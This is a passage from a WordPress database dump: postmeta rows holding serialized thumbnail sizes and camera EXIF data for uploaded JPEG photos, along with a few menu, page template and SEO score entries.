"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096280\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.142857142857\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(959,465,'_wp_attached_file','2016/03/DSCN4151.jpg'),(960,465,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4151.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4151-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4151-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4151-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4151-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4151-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4151-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4151-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4151-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4151-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4151-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4151-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4151-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096323\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0641025641026\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(961,466,'_wp_attached_file','2016/03/DSCN4153.jpg'),(962,466,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4153.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4153-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4153-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4153-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4153-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4153-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4153-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4153-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4153-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4153-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4153-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4153-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4153-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096365\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.196078431373\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(963,467,'_wp_attached_file','2016/03/DSCN4155.jpg'),(964,467,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4155.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4155-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4155-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4155-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4155-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4155-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4155-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4155-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4155-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4155-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4155-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4155-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4155-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096488\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.322580645161\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(965,468,'_wp_attached_file','2016/03/DSCN4157.jpg'),(966,468,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4157.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4157-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4157-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4157-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4157-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4157-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4157-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4157-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4157-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4157-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4157-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4157-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4157-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096546\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0952380952381\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(967,46,'_yoast_wpseo_content_score','60'),(968,473,'_edit_lock','1561665522:2'),(969,473,'_edit_last','1'),(970,473,'_wp_page_template','default'),(971,474,'vantage_metaslider_slider',''),(972,474,'vantage_metaslider_slider_stretch','1'),(973,474,'vantage_menu_icon',''),(974,474,'_menu_item_type','post_type'),(975,474,'_menu_item_menu_item_parent','41'),(976,474,'_menu_item_object_id','473'),(977,474,'_menu_item_object','page'),(978,474,'_menu_item_target',''),(979,474,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(980,474,'_menu_item_xfn',''),(981,474,'_menu_item_url',''),(982,473,'vantage_metaslider_slider',''),(983,473,'vantage_metaslider_slider_stretch','1'),(984,473,'vantage_menu_icon',''),(985,473,'_yoast_wpseo_content_score','30'),(986,484,'_wp_attached_file','2017/01/DSC0273.jpg'),(987,484,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4288;s:6:\"height\";i:2848;s:4:\"file\";s:19:\"2017/01/DSC0273.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0273-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0273-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0273-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0273-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0273-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0273-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0273-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0273-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0273-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0273-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0273-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0273-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472238031\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:4:\"2000\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(988,485,'_wp_attached_file','2017/01/DSC0428.jpg'),(989,485,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4288;s:6:\"height\";i:2848;s:4:\"file\";s:19:\"2017/01/DSC0428.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0428-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DSC0428-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DSC0428-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"DSC0428-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0428-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"DSC0428-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"DSC0428-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:20:\"DSC0428-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"DSC0428-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"DSC0428-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"DSC0428-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:19:\"DSC0428-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1472288481\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"300\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(990,486,'_wp_attached_file','2017/01/DSCN3325.jpg'),(991,486,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3325.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3325-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3325-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3325-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3325-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3325-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3325-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3325-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3325-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3325-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3325-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3325-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3325-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1456178262\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"216\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0088573959256\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(992,487,'_wp_attached_file','2017/01/DSCN3449.jpg'),(993,487,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3449.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3449-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3449-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3449-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3449-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3449-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3449-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3449-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3449-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN3449-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN3449-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN3449-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN3449-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1461817862\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"336\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00299132515704\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(996,489,'_wp_attached_file','2017/01/DSCN3540.jpg'),(997,489,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN3540.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3540-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN3540-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN3540-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN3540-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3540-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN3540-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN3540-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN3540-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13: